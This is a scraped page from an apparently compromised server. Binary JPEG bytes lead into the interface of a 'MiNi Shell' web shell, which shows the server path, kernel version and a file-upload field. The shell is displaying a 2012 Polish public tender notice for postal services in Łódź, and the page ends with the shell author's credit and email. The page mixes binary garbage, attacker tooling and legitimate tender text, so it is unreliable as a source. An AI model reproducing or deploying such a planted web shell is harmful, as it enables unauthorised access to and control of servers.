JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/243677-N-2012.html

<p class="kh_header"><b>Łódź: Świadczenie na rzecz Zamawiającego powszechnych usług pocztowych w obrocie krajowym o wadze do 50 gram i powyżej 50 gram</b><br>
<b>Numer ogłoszenia: 243677 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 6847601, faks 42 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie na rzecz Zamawiającego powszechnych usług pocztowych w obrocie krajowym o wadze do 50 gram i powyżej 50 gram.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem postępowania jest udzielenie zamówienia publicznego na świadczenie na rzecz Zamawiającego w zakresie określonym w pkt 2-6.

	 

2.  Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego powszechnych usług    
     pocztowych, w oparciu o niżej określone akty prawne: 
a)  ustawy z dnia 12.06.2003 r. Prawo pocztowe (tekst jednolity Dz.U. z 2008 r. Nr 189 poz. 1159, z 
     późn. zm.);
b)  Rozporządzenia Ministra Infrastruktury z dnia 13.10. 2003 r. w sprawie reklamacji powszechnej 
     usługi pocztowej w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. z 2003 r. 
     Nr 183 poz. 1795, z późn. zm.); 
c)  Rozporządzenia Ministra Infrastruktury z dnia 09. 01.2004 r. w sprawie warunków 
     wykonywania powszechnych usług pocztowych (Dz.U. z 2004 r. Nr 5 poz. 34, z późn. zm);
d)  Regulaminu poczty listowej (Dz.U. z 2007 r.  Nr 108 poz.744,  z późn. zm.);
e)   Innych, związanych z realizacją usług pocztowych;
     w zakresie: przyjmowania nadawanych przez Zamawiającego przesyłek pocztowych, 
     przemieszczania i doręczania ich adresatom na obszarze kraju, a także zwrotu przesyłek 
     pocztowych niedoręczonych.

3.  Przedmiot zamówienia obejmuje usługi pocztowe w obrocie krajowym  o różnym gabarycie oraz 
     wadze do 50 g  i  powyżej 50 g określone niżej:
     a) przesyłki listowe zwykłe (ekonomiczne) - nierejestrowane,
     b) przesyłki listowe polecone (ekonomiczne) - rejestrowane,
     c) przesyłki listowe polecone za potwierdzeniem odbioru, (ekonomiczne) - rejestrowane,
     d) przesyłki listowe polecone priorytetowe rejestrowane.

4.  W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do:
      a) nadawania przesyłek listowych w dniu ich odbioru od Zamawiającego, 
      b) doręczania przesyłek listowych z zachowaniem wskaźników terminowości doręczeń 
           przesyłek w obrocie krajowym wskazanym w Rozporządzeniu Ministra Infrastruktury  z dnia
           09.01.2004 r. w sprawie warunków wykonywania powszechnych usług pocztowych 
           (Dz.U. Nr 5 poz. 34,  z późn. zm.),
     c) dostarczania przesyłek listowych do każdego miejsca na obszarze całego kraju,
     d) dla przesyłek listowych za zwrotnym potwierdzeniem odbioru,  doręczania  niezwłocznie 
         do siedziby  Zamawiającego pokwitowanego przez adresata potwierdzenia doręczenia 
         przesyłki,  (w przypadku nieobecności adresata, Wykonawca pozostawi zawiadomienie 
         (awizo pierwsze) ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę. Termin do 
         odbioru przesyłki  przez adresata wynosi 14 dni liczonych od następnego dnia po dniu 
         pozostawienia pierwszego awizo - w tym terminie przesyłka jest awizowana powtórnie. Po 
         upływie terminu odbioru, przesyłka zwracana jest Zamawiającemu wraz z podaniem 
         przyczyny nie odebrania przez adresata - zgodnie z art. 150 Ordynacji podatkowej, bądź 
         art. 44 Kodeksu postępowania administracyjnego),
     e) oznaczania wszystkich przesyłek listowych rejestrowanych i priorytetowych,      
     f) posiadania placówki nadawczej, a także punktów odbioru awizowanych przesyłek      
         w miejscowości oraz dzielnicy, w której mieści się siedziba Zamawiającego,
     g) ponoszenia pełnej odpowiedzialności za szkody powstałe w wyniku prowadzonych usług.   

5.  Zamawiający w przedmiocie zamówienia zobowiązuje się do:
     a) prawidłowego adresowania przesyłek listowych w sposób czytelny i zgodny z normami,
     b) stosowania i używania kopert listowych  -  zgodnie z normami:  (PN-T- 85004, PN-T 85003, 
         PN-IS0269) - waga przesyłek określona będzie w stanie zamkniętym, (Zamawiający nie 
         dopuszcza stosowania przez Wykonawcę własnych opakowań na przesyłki jak również 
         doczepiania lub przyklejania przez Wykonawcę różnych przedmiotów lub znaków do 
         przesyłki listowej w celu zwiększenia jej masy wagowej), 
     c) sporządzania zestawień ilościowo - wartościowych  (w dwóch egz. po jednym dla każdej 
         strony) nadanych przesyłek nierejestrowanych z uwzględnieniem kategorii i podziałów 
         wagowych - wzór zestawienia winien być uzgodniony z Wykonawcą,
     d) sporządzania zestawień ilościowo - wartościowych  (w dwóch egz. po jednym dla każdej 
         strony) nadanych przesyłek rejestrowanych z uwzględnieniem kategorii i podziałów 
         wagowych - wzór zestawienia winien być uzgodniony z Wykonawcą,
      e) uiszczania należnych opłat pocztowych od przesyłek listowych w formie opłaty z dołu,       
      f) umieszczania na stronie adresowej przesyłek stosownego oznaczenia potwierdzającego 
          wniesienie opłaty w postaci: napisu/nadruku lub odcisku pieczęci o treści ustalonej z 
          Wykonawcą.
6.  Zasady rozliczania i regulowania należności za wykonane usługi:
      a) za okres rozliczeniowy przyjmuje się miesiąc kalendarzowy,
      b) podstawą rozliczeń finansowych jest suma opłat za rzeczywiście nadane i zwrócone 
           przesyłki, stwierdzona na podstawie dokumentów nadawczych i oddawczych - zgodnie z 
           oferowanym cennikiem usług pocztowych,
       c) należności wynikające z wystawionych przez Wykonawcę faktur VAT wg stawki 
           obowiązującej na dzień wystawienia faktury VAT,   Zamawiający regulować będzie na 
           konto wskazane na fakturze w terminie do 30 dni od daty jej przyjęcia przez 
           Zamawiającego, (na przelewie Zamawiający zobowiązany jest do określenia tytułu wpłat);
       d) w przypadku nieterminowej zapłaty, Zamawiający zobowiązuję się do zapłaty Wykonawcy 
            ustawowych odsetek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 
       Ustawy, który dotyczy:
   a) posiadania uprawnień do wykonywania określonej działalności lub czynności,     
       jeżeli przepisy prawa nakładają obowiązek ich posiadania;
       Wykonawca winien udokumentować, że posiada aktualne zezwolenie na prowadzenie 
        działalności pocztowej wydane przez Prezesa Urzędu Komunikacji Elektronicznej - zgodnie z 
        art. 6 ustawy z dnia 12.06. 2003 r. Prawo pocztowe ( Dz.U. z 2008 r Nr 189, poz. 1159 z późn, 
        zm.) w zakresie: przyjmowania, przemieszczania i doręczania przesyłek w obrocie krajowym.
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców 
    Dokumentów,  na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 
       Ustawy, który dotyczy:
   a) posiadania wiedzy i doświadczenia;
       Wykonawca winien wykazać w zał. nr 3 do SIWZ,  że w okresie ostatnich trzech przed 
       upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym 
       okresie, wykonał  co najmniej jedną usługę w okresie 12 miesięcy o wartości nie mniejszej niż 
       100 000,00 zł. w zakresie usług pocztowych w obrocie krajowym, z podaniem ich wartości, 
       przedmiotu, dat wykonania  z załączeniem dokumentu potwierdzającego, że usługi te zostały 
       wykonane należycie.  
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców 
    dokumentów i oświadczeń,  na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 
       Ustawy, który dotyczy:
   a) sytuacji ekonomicznej i finansowej;
       Wykonawca winien  udokumentować, że posiada opłaconą polisę ubezpieczeniową, lub inny 
        dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w 
        zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę 
        ubezpieczenia nie mniej niż 100 000,00 zł. W przypadku załączenia ważności dokumentu na    
        okres krótszy od terminu realizacji zamówienia, do ofert należy dołączyć pisemne 
        zobowiązanie o przedłużeniu ważności ubezpieczenia.      
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców 
    dokumentów i oświadczeń,  na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz cenowy przygotowany zgodnie z wzorem,
2. projekt umowy ze stosownymi załącznikami, który nie może być sprzeczny z treścią SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza zgodnie z art. 144 ustawy Pzp w trakcie realizacji umowy możliwość wprowadzenia istotnych zmian postanowień umowy:
a)	w przypadku zmiany obowiązujących przepisów prawnych odnoszących się niniejszego 
      zamówienia;
b)	w przypadku zmiany wynagrodzenia Wykonawcy w wyniku ustawowych zmian urzędowo 
      obowiązującej stawki podatku od towarów i usług (VAT);
2.  Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A.N.Łódź- Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, w cenie 20,00 zł (brutto).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 10:00, miejsce: A.N.Łódź- Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11 pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com